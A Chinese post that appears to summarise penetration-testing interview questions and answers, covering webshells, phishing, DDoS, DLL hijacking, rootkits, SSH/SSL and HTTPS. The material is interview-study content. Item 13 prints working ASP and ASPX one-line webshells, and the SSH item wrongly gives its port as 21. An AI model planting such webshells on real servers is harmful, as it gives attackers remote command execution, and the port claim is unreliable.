安恒網(wǎng)安面試題來(lái)啦!兄弟們沖起來(lái)~(上)
今天剛面完安恒滲透測(cè)試崗,給大家總結(jié)起來(lái)。
1.什么是 WebShell?
WebShell 就是以 asp、php、jsp 或者 cgi 等網(wǎng)頁(yè)文件形式存在的─種命令執(zhí)行環(huán)境,也可以將其稱(chēng)做為─種網(wǎng)頁(yè)后門(mén)。黑客在入侵了─個(gè)網(wǎng)站后,通常會(huì)將這些asp 或 php 后門(mén)文件與網(wǎng)站服務(wù)器 WEB 目錄下正常的網(wǎng)頁(yè)文件混在─起,然后就可以使用瀏覽器來(lái)訪問(wèn)這些 asp 或者 php 后門(mén),得到─個(gè)命令執(zhí)行環(huán)境,以達(dá)到控制網(wǎng)站服務(wù)器的目的(可以上傳下載文件,查看數(shù)據(jù)庫(kù),執(zhí)行任意程序命令等)。國(guó)內(nèi)常用的 WebShell 有海陽(yáng) ASP 木馬,Phpspy,c99shell 等。
靜態(tài)網(wǎng)頁(yè):最常用的格式文件就是 html 格式文件,大部分網(wǎng)頁(yè)的格式都是 html格式,html 格式又包含有.htm、dhtml.xhtml.shtm.shtml。這些都是指靜態(tài)頁(yè)面,里面不含有動(dòng)態(tài)程序。
動(dòng)態(tài)網(wǎng)頁(yè):頁(yè)面級(jí)包括有 ASP(基于 JavaScript 或 VbScript 或 C#)、JSP、PHP、ASPX、jspx、cgi。這些里面是包含服務(wù)器端執(zhí)行的代碼,也就是服務(wù)器在將這些網(wǎng)頁(yè)發(fā)給客戶(hù)端之前,會(huì)先執(zhí)行里面的動(dòng)態(tài)程序語(yǔ)言,并把執(zhí)行后生成的 html 發(fā)送到客戶(hù)端來(lái)的,所以我們?cè)诳蛻?hù)端看到的源代碼也是 html 格式的(因?yàn)閯?dòng)態(tài)的代碼直接在服務(wù)器上執(zhí)行,而這些服務(wù)器代碼是前臺(tái)是不會(huì)顯示出來(lái)。
2.什么是網(wǎng)絡(luò)釣魚(yú)?
網(wǎng)絡(luò)釣魚(yú)是通過(guò)大量發(fā)送聲稱(chēng)來(lái)自于銀行或其他知名機(jī)構(gòu)的欺騙性垃圾郵件,意圖引誘收信人給出敏感信息(如用戶(hù)名、口令、帳號(hào) ID 、 ATMPIN 碼或信用卡詳細(xì)信息)的一種攻擊方式。
最典型的網(wǎng)絡(luò)釣魚(yú)攻擊將收信人引誘到一個(gè)通過(guò)精心設(shè)計(jì)與目標(biāo)組織的網(wǎng)站非常相似的釣魚(yú)網(wǎng)站上,并獲取收信人在此網(wǎng)站上輸入的個(gè)人敏感信息,通常這個(gè)攻擊過(guò)程不會(huì)讓受害者警覺(jué)。
它常常導(dǎo)引用戶(hù)到 URL 與接口外觀與真正網(wǎng)站幾無(wú)二致的假冒網(wǎng)站輸入個(gè)人數(shù)據(jù)。就算使用強(qiáng)式加密的 SSL 服務(wù)器認(rèn)證,要偵測(cè)網(wǎng)站是否仿冒實(shí)際上仍很困難。網(wǎng)釣是一種利用社會(huì)工程技術(shù)來(lái)愚弄用戶(hù)的實(shí)例。它憑恃的是現(xiàn)行網(wǎng)絡(luò)安全技術(shù)的低親和度。
3.你獲取網(wǎng)絡(luò)安全知識(shí)途徑有哪些?
網(wǎng)站,看雪,安全焦點(diǎn),國(guó)內(nèi)的烏云,F(xiàn)reeBuf ;
視頻學(xué)習(xí):i 春秋,51cto,慕課網(wǎng),實(shí)驗(yàn)樓,實(shí)驗(yàn)吧,網(wǎng)易云課堂等等;
微信公眾號(hào)、知乎等,企業(yè) src 等;
書(shū)籍,《白帽子講 web 安全》《Web 應(yīng)用安全權(quán)威指南》等;
然后就是請(qǐng)教牛人;
自己寫(xiě)博客CSDN,打靶場(chǎng)。
4.什么是 CC 攻擊?
這個(gè)也是知道一些,知道他是 DDos 的變種,正常請(qǐng)求偽造,服務(wù)器資源耗盡,最終還是看看百科答案吧:CC 攻擊是 DDOS(分布式拒絕服務(wù))的一種,相比其它的 DDOS 攻擊 CC 似乎更有技術(shù)含量一些。這種攻擊你見(jiàn)不到真實(shí)源 IP,見(jiàn)不到特別大的異常流量,但造成服務(wù)器無(wú)法進(jìn)行正常連接。CC 攻擊的原理就是攻擊者控制某些主機(jī)不停地發(fā)大量數(shù)據(jù)包給對(duì)方服務(wù)器造成服務(wù)器資源耗盡,一直到宕機(jī)崩潰。CC 主要是用來(lái)攻擊頁(yè)面的,每個(gè)人都有這樣的體驗(yàn):當(dāng)一個(gè)網(wǎng)頁(yè)訪問(wèn)的人數(shù)特別多的時(shí)候,打開(kāi)網(wǎng)頁(yè)就慢了,CC 就是模擬多個(gè)用戶(hù)(多少線程就是多少用戶(hù))不停地進(jìn)行訪問(wèn)那些需要大量數(shù)據(jù)操作(就是需要大量 CPU時(shí)間)的頁(yè)面,造成服務(wù)器資源的浪費(fèi),CPU 長(zhǎng)時(shí)間處于 100%,永遠(yuǎn)都有處理不完的連接直至就網(wǎng)絡(luò)擁塞,正常的訪問(wèn)被中止。
5.Web 服務(wù)器被入侵后,怎樣進(jìn)行排查?
最簡(jiǎn)單就是
查看下 web 服務(wù)器日志
看看有沒(méi)有異常端口開(kāi)放
使用安全狗等服務(wù)器安全軟件清掃
6.dll 文件是什么意思,有什么用?
DLL(Dynamic Link Library)文件,即動(dòng)態(tài)鏈接庫(kù),也有人稱(chēng)作應(yīng)用程序拓展。
Windows 應(yīng)用程序中,實(shí)行了模塊化設(shè)計(jì),也就是說(shuō)并不是每個(gè)應(yīng)用程序都編寫(xiě)完所有的功能代碼,而是在運(yùn)行過(guò)程中調(diào)用相應(yīng)功能的 DLL,不需運(yùn)行的功能就不調(diào)用,所以大大加快了程序的加載速度和效率,其他應(yīng)用程序也可以調(diào)用相
關(guān)的 DLL,這樣也有利于促進(jìn)代碼重用以及內(nèi)存使用效率,減少了資源占用,而且程序更新時(shí)也只要更新相關(guān)的 DLL 就可以了。
要注意的是,有些病毒也會(huì)偽裝成 DLL 文件,并替換系統(tǒng)的 DLL 文件,需要我們防范。
DLL 劫持原理
由于輸入表中只包含 DLL 名而沒(méi)有它的路徑名,因此加載程序必須在磁盤(pán)上搜索 DLL 文件。首先會(huì)嘗試從當(dāng)前程序所在的目錄加載 DLL,如果沒(méi)找到,則在Windows 系統(tǒng)目錄中查找,最后是在環(huán)境變量中列出的各個(gè)目錄下查找。利用
這個(gè)特點(diǎn),先偽造一個(gè)系統(tǒng)同名的 DLL,提供同樣的輸出表,每個(gè)輸出函數(shù)轉(zhuǎn)向真正的系統(tǒng) DLL。程序調(diào)用系統(tǒng) DLL 時(shí)會(huì)先調(diào)用當(dāng)前目錄下偽造的 DLL,完成相關(guān)功能后,再跳到系統(tǒng) DLL 同名函數(shù)里執(zhí)行。這個(gè)過(guò)程用個(gè)形象的詞來(lái)描述
就是系統(tǒng) DLL 被劫持(hijack)了。
偽造的 dll 制作好后,放到程序當(dāng)前目錄下,這樣當(dāng)原程序調(diào)用原函數(shù)時(shí)就調(diào)用了偽造的 dll 的同名函數(shù),進(jìn)入劫持 DLL 的代碼,處理完畢后,再調(diào)用原 DLL此函數(shù)。
如何防止 DLL 劫持
DLL 劫持利用系統(tǒng)未知 DLL 的搜索路徑方式,使得程序加載當(dāng)前目錄下的系統(tǒng)同名 DLL。所以可以告訴系統(tǒng) DLL 的位置,改變加載系統(tǒng) DLL 的順序不是當(dāng)前目錄,而是直接到系統(tǒng)目錄下查找。
7.0day 漏洞
是已經(jīng)發(fā)現(xiàn)但是官方還沒(méi)發(fā)布補(bǔ)丁的漏洞。
信息安全意義上的 0Day 是指在安全補(bǔ)丁發(fā)布前而被了解和掌握的漏洞信息。
8.Rootkit 是什么意思?
Rootkit 是一種特殊類(lèi)型的 malware(惡意軟件)。Rootkit 之所以特殊是因?yàn)槟恢浪鼈冊(cè)谧鍪裁词虑椤ootkit 基本上是無(wú)法檢測(cè)到的,而且?guī)缀醪豢赡軇h除它們。雖然檢測(cè)工具在不斷增多,但是惡意軟件的開(kāi)發(fā)者也在不斷尋找新的途
徑來(lái)掩蓋他們的蹤跡。
Rootkit 的目的在于隱藏自己以及其他軟件不被發(fā)現(xiàn)。它可以通過(guò)阻止用戶(hù)識(shí)別和刪除攻擊者的軟件來(lái)達(dá)到這個(gè)目的。
Rootkit 幾乎可以隱藏任何軟件,包括文件服務(wù)器、鍵盤(pán)記錄器、Botnet 和 Remailer。許多 Rootkit 甚至可以隱藏大型的
文件集合并允許攻擊者在您的計(jì)算機(jī)上保存許多文件,而您無(wú)法看到這些文件。
Rootkit 本身不會(huì)像病毒或蠕蟲(chóng)那樣影響計(jì)算機(jī)的運(yùn)行。攻擊者可以找出目標(biāo)系統(tǒng)上的現(xiàn)有漏洞。漏洞可能包括:開(kāi)放的網(wǎng)絡(luò)端口、未打補(bǔ)丁的系統(tǒng)或者具有脆弱的管理員密碼的系統(tǒng)。在獲得存在漏洞的系統(tǒng)的訪問(wèn)權(quán)限之后,攻擊者便可手
動(dòng)安裝一個(gè) Rootkit。這種類(lèi)型的偷偷摸摸的攻擊通常不會(huì)觸發(fā)自動(dòng)執(zhí)行的網(wǎng)絡(luò)安全控制功能,例如入侵檢測(cè)系統(tǒng)。
找出 Rootkit 十分困難。有一些軟件包可以檢測(cè) Rootkit。這些軟件包可劃分為以下兩類(lèi):基于簽名的檢查程序和基于行為的檢查程序。基于簽名(特征碼)的檢查程序,例如大多數(shù)病毒掃描程序,會(huì)檢查二進(jìn)制文件是否為已知的 Rootkit。
基于行為的檢查程序試圖通過(guò)查找一些代表 Rootkit 主要行為的隱藏元素來(lái)找出 Rootkit。一個(gè)流行的基于行為的 Rootkit 檢查程序是 Rootkit Revealer.
在發(fā)現(xiàn)系統(tǒng)中存在 Rootkit 之后,能夠采取的補(bǔ)救措施也較為有限。由于Rootkit 可以將自身隱藏起來(lái),所以您可能無(wú)法知道它們已經(jīng)在系統(tǒng)中存在了多長(zhǎng)的時(shí)間。而且您也不知道 Rootkit 已經(jīng)對(duì)哪些信息造成了損害。對(duì)于找出的 Rootkit,最好的應(yīng)對(duì)方法便是擦除并重新安裝系統(tǒng)。雖然這種手段很?chē)?yán)厲,但是這是得到證明的唯一可以徹底刪除 Rootkit 的方法。
防止 Rootkit 進(jìn)入您的系統(tǒng)是能夠使用的最佳辦法。為了實(shí)現(xiàn)這個(gè)目的,可以使用與防范所有攻擊計(jì)算機(jī)的惡意軟件一樣的深入防衛(wèi)策略。深度防衛(wèi)的要素包括:病毒掃描程序、定期更新軟件、在主機(jī)和網(wǎng)絡(luò)上安裝防火墻,以及強(qiáng)密碼策
略。
9.蜜罐
蜜罐好比是情報(bào)收集系統(tǒng)。蜜罐好像是故意讓人攻擊的目標(biāo),引誘黑客前來(lái)攻擊。所以攻擊者入侵后,你就可以知道他是如何得逞的,隨時(shí)了解針對(duì)服務(wù)器發(fā)動(dòng)的最新的攻擊和漏洞。還可以通過(guò)竊聽(tīng)黑客之間的聯(lián)系,收集黑客所用的種種工具,并且掌握他們的社交網(wǎng)絡(luò)。
10.ssh
==遠(yuǎn)程登陸用的、端口21,下面的描述了解即可。==
SSH 為 Secure Shell 的縮寫(xiě),由 IETF 的網(wǎng)絡(luò)小組(Network Working Group)所制定;SSH 為建立在應(yīng)用層基礎(chǔ)上的安全協(xié)議。SSH 是目前較可靠,專(zhuān)為遠(yuǎn)程登錄會(huì)話(huà)和其他網(wǎng)絡(luò)服務(wù)提供安全性的協(xié)議。利用 SSH 協(xié)議可以有效防止遠(yuǎn)程管理過(guò)程中的信息泄露問(wèn)題。SSH 最初是 UNIX 系統(tǒng)上的一個(gè)程序,后來(lái)又迅速擴(kuò)展到其他操作平臺(tái)。SSH 在正確使用時(shí)可彌補(bǔ)網(wǎng)絡(luò)中的漏洞。SSH 客戶(hù)端適用于多種平臺(tái)。幾乎所有 UNIX 平臺(tái)—包括 HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平臺(tái),都可運(yùn)行 SSH。
傳統(tǒng)的網(wǎng)絡(luò)服務(wù)程序,如:ftp、pop 和 telnet 在本質(zhì)上都是不安全的,因?yàn)樗鼈冊(cè)诰W(wǎng)絡(luò)上用明文傳送口令和數(shù)據(jù),別有用心的人非常容易就可以截獲這些口令和數(shù)據(jù)。而且,這些服務(wù)程序的安全驗(yàn)證方式也是有其弱點(diǎn)的,就是很容易受到“中間人”(man-in-the-middle)這種方式的攻擊。
所謂“中間人”的攻擊方式,就是“中間人”冒充真正的服務(wù)器接收你傳給服務(wù)器的數(shù)據(jù),然后再冒充你把數(shù)據(jù)傳給真正的服務(wù)器。服務(wù)器和你之間的數(shù)據(jù)傳送被“中間人”一轉(zhuǎn)手做了手腳之后,就會(huì)出現(xiàn)很?chē)?yán)重的問(wèn)題。通過(guò)使用 SSH,你可以把所有傳輸?shù)臄?shù)據(jù)進(jìn)行加密,這樣" 中間人"這種攻擊方式就不可能實(shí)現(xiàn)了,而且也能夠防止 DNS 欺騙和 IP 欺騙。
使用 SSH,還有一個(gè)額外的好處就是傳輸?shù)臄?shù)據(jù)是經(jīng)過(guò)壓縮的,所以可以加快傳輸?shù)乃俣取SH 有很多功能,它既可以代替 Telnet,又可以為 FTP、PoP、甚至為 PPP 提供一個(gè)安全的"通道"。英文全稱(chēng)是 Secure Shell。通過(guò)使用 SSH,你可以把所有傳輸?shù)臄?shù)據(jù)進(jìn)行加密,這樣"中間人"這種攻擊方式就不可能實(shí)現(xiàn)了,而且也能夠防止 DNS 和 IP 欺騙。
還有一個(gè)額外的好處就是傳輸?shù)臄?shù)據(jù)是經(jīng)過(guò)壓縮的,所以可以加快傳輸?shù)乃俣取?SSH 有很多功能,它既可以代替 telnet,又可以為 ftp、pop、甚至 ppp 提供一個(gè)安全的"通道"。
SSH 是由客戶(hù)端和服務(wù)端的軟件組成的,有兩個(gè)不兼容的版本分別是:1.x 和2.x。用 SSH 2.x 的客戶(hù)程序是不能連接到 SSH 1.x 的服務(wù)程序上去的。OpenSSH 2.x 同時(shí)支持 SSH 1.x 和 2.x。SSH 的安全驗(yàn)證是如何工作的從客戶(hù)端來(lái)看,SSH 提供兩種級(jí)別的安全驗(yàn)證。第一種級(jí)別(基于口令的安全驗(yàn)證)只要你知道自己帳號(hào)和口令,就可以登錄到遠(yuǎn)程主機(jī)。所有傳輸?shù)臄?shù)據(jù)都會(huì)被加密,但是不能保證你正在連接的服務(wù)器就是你想連接的服務(wù)器。可能會(huì)有別的服務(wù)器在冒充真正的服務(wù)器,也就是受到“中間人”這種方式的攻擊。第二種級(jí)別(基于密匙的安全驗(yàn)證)需要依靠密匙,也就是你必須為自己創(chuàng)建一對(duì)密匙,并把公用密匙放在需要訪問(wèn)的服務(wù)器上。如果你要連接到 SSH 服務(wù)器上,客戶(hù)端軟件就會(huì)向服務(wù)器發(fā)出請(qǐng)求,請(qǐng)求用你的密匙進(jìn)行安全驗(yàn)證。服務(wù)器收到請(qǐng)求之后,先在你在該服務(wù)器的家目錄下尋找你的公用密匙,然后把它和你發(fā)送過(guò)來(lái)的公用密匙進(jìn)行比較。如果兩個(gè)密匙一致,服務(wù)器就用公用密匙加密“質(zhì)詢(xún)”(challenge)
并把它發(fā)送給客戶(hù)端軟件。客戶(hù)端軟件收到“質(zhì)詢(xún)”之后就可以用你的私人密匙解密再把它發(fā)送給服務(wù)器。用這種方式,你必須知道自己密匙的口令。但是,與第一種級(jí)別相比,第二種級(jí)別不需要在網(wǎng)絡(luò)上傳送口令。第二種級(jí)別不僅加密所有傳送的數(shù)據(jù),而且“中間人”這種攻擊方式也是不可能的(因?yàn)樗麤](méi)有你的私人密匙)。但是整個(gè)登錄的過(guò)程可能需要 10 秒。
SSL(SecureSockets Layer (SSL) and Transport Layer Security (TLS))被設(shè)計(jì)為加強(qiáng) Web 安全傳輸(HTTP/HTTPS/)的協(xié)議(事實(shí)上還有 SMTP/NNTP等),SSH(Secure Shell)更多的則被設(shè)計(jì)為加強(qiáng) Telnet/FTP 安全的傳輸協(xié)議,默認(rèn)地,它使用 22 端口.
以 SSL 為例,基本上 SSL 在傳輸過(guò)程中所處的位置如下: ---------
|HTTP | ---------
| SSL| ---------
| TCP| ---------
| IP| ---------
如果利用 SSL 協(xié)議來(lái)訪問(wèn)網(wǎng)頁(yè),其步驟如下:
用戶(hù):在瀏覽器的地址欄里輸入 https://www.sslserver.com
HTTP 層:將用戶(hù)需求翻譯成 HTTP 請(qǐng)求,如
GET/index.htm HTTP/1.1
Hosthttp://www.sslserver.com
SSL 層: 借助下層協(xié)議的的信道安全的協(xié)商出一份加密密鑰,并用此密鑰來(lái)加密HTTP 請(qǐng)求。
TCP 層:與 web server 的 443 端口建立連接,傳遞 SSL 處理后的數(shù)據(jù)。接收端與此過(guò)程相反。
SSL 在 TCP 之上建立了一個(gè)加密通道,通過(guò)這一層的數(shù)據(jù)經(jīng)過(guò)了加密,因此達(dá)到保密的效果。
SSL 協(xié)議分為兩部分:Handshake Protocol 和 Record Protocol,。其中Handshake Protocol 用來(lái)協(xié)商密鑰,協(xié)議的大部分內(nèi)容就是通信雙方如何利用它來(lái)安全的協(xié)商出一份密鑰。 Record Protocol 則定義了傳輸?shù)母袷?
11.DDOS
http://baike.baidu.com/link?url=hOeNhuaIj6tF9NY1wr2wbe9pIe52PaCJ5KXTisdfPUK4j8beTktmVsRaH5hRjkcpq6FPouzRl2hbsbpEDO5HRAUYi_D1Tsnu_q7in59xRasqHbmi1oYhEyVDVVn9ZcIcqRsZi5axo_HgkXBPioJx_#10
分布式拒絕服務(wù)(DDoS:Distributed Denial of Service)攻擊指借助于客戶(hù)/服務(wù)器技術(shù),將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái),對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng) DDoS 攻擊,從而成倍地提高拒絕服務(wù)攻擊的威力。通常,攻擊者使用一個(gè)偷竊帳號(hào)將DDoS 主控程序安裝在一個(gè)計(jì)算機(jī)上,在一個(gè)設(shè)定的時(shí)間主控程序?qū)⑴c大量代理程序通訊,代理程序已經(jīng)被安裝在網(wǎng)絡(luò)上的許多計(jì)算機(jī)上。代理程序收到指令時(shí)就發(fā)動(dòng)攻擊。利用客戶(hù)/服務(wù)器技術(shù),主控程序能在幾秒鐘內(nèi)激活成百上千次代理程序的運(yùn)行。
12.震網(wǎng)病毒
指一種蠕蟲(chóng)病毒,是第一個(gè)專(zhuān)門(mén)定向攻擊真實(shí)世界中基礎(chǔ)(能源)設(shè)施的“蠕蟲(chóng)” 病毒,比如核電站,水壩,國(guó)家電網(wǎng)。只要電腦操作員將被病毒感染的 U 盤(pán)插入 USB 接口,這種病毒就會(huì)在神不知鬼不覺(jué)的情況下(不會(huì)有任何其他操作要求或者提示出現(xiàn))取得一些工業(yè)用電腦系統(tǒng)的控制權(quán)。
與傳統(tǒng)的電腦病毒相比,“震網(wǎng)”病毒不會(huì)通過(guò)竊取個(gè)人隱私信息牟利。無(wú)需借助網(wǎng)絡(luò)連接進(jìn)行傳播。這種病毒可以破壞世界各國(guó)的化工、發(fā)電和電力傳輸企業(yè)所使用的核心生產(chǎn)控制電腦軟件,并且代替其對(duì)工廠其他電腦“發(fā)號(hào)施令”。極具毒性和破壞力。“震網(wǎng)”代碼非常精密,主要有兩個(gè)功能,一是使伊朗的離心機(jī)運(yùn)行失控,二是掩蓋發(fā)生故障的情況,“謊報(bào)軍情”,以“正常運(yùn)轉(zhuǎn)”記錄回傳給管理部門(mén),造成決策的誤判。
13.一句話(huà)木馬
asp 一句話(huà)木馬:
<%execute(request("value"))%>
php 一句話(huà)木馬:
變形:
aspx 一句話(huà)木馬:
<%@ PageLanguage="Jscript"%> <%eval(Request.Item["value"])%>
14.Https 的作用?
(HTTP+SSL)
內(nèi)容加密建立一個(gè)信息安全通道,來(lái)保證數(shù)據(jù)傳輸?shù)陌踩?/p>
身份認(rèn)證確認(rèn)網(wǎng)站的真實(shí)性;
數(shù)據(jù)完整性防止內(nèi)容被第三方冒充或者篡改。
HTTPS 和 HTTP 的區(qū)別
https 協(xié)議需要到 CA 申請(qǐng)證書(shū)。
http 是超文本傳輸協(xié)議,信息是明文傳輸;https 則是具有安全性的 ssl 加密傳輸協(xié)議。
http 和 https 使用的是完全不同的連接方式,用的端口也不一樣,前者是 80,后者是 443。
http 的連接很簡(jiǎn)單,是無(wú)狀態(tài)的;HTTPS 協(xié)議是由 SSL+HTTP 協(xié)議構(gòu)建的可進(jìn)行加密傳輸、身份認(rèn)證的網(wǎng)絡(luò)協(xié)議,比 http 協(xié)議安全。
看完直接上班!!!
漏洞掃描服務(wù) 網(wǎng)絡(luò) 通用安全
版權(quán)聲明:本文內(nèi)容由網(wǎng)絡(luò)用戶(hù)投稿,版權(quán)歸原作者所有,本站不擁有其著作權(quán),亦不承擔(dān)相應(yīng)法律責(zé)任。如果您發(fā)現(xiàn)本站中有涉嫌抄襲或描述失實(shí)的內(nèi)容,請(qǐng)聯(lián)系我們jiasou666@gmail.com 處理,核實(shí)后本網(wǎng)站將在24小時(shí)內(nèi)刪除侵權(quán)內(nèi)容。
版權(quán)聲明:本文內(nèi)容由網(wǎng)絡(luò)用戶(hù)投稿,版權(quán)歸原作者所有,本站不擁有其著作權(quán),亦不承擔(dān)相應(yīng)法律責(zé)任。如果您發(fā)現(xiàn)本站中有涉嫌抄襲或描述失實(shí)的內(nèi)容,請(qǐng)聯(lián)系我們jiasou666@gmail.com 處理,核實(shí)后本網(wǎng)站將在24小時(shí)內(nèi)刪除侵權(quán)內(nèi)容。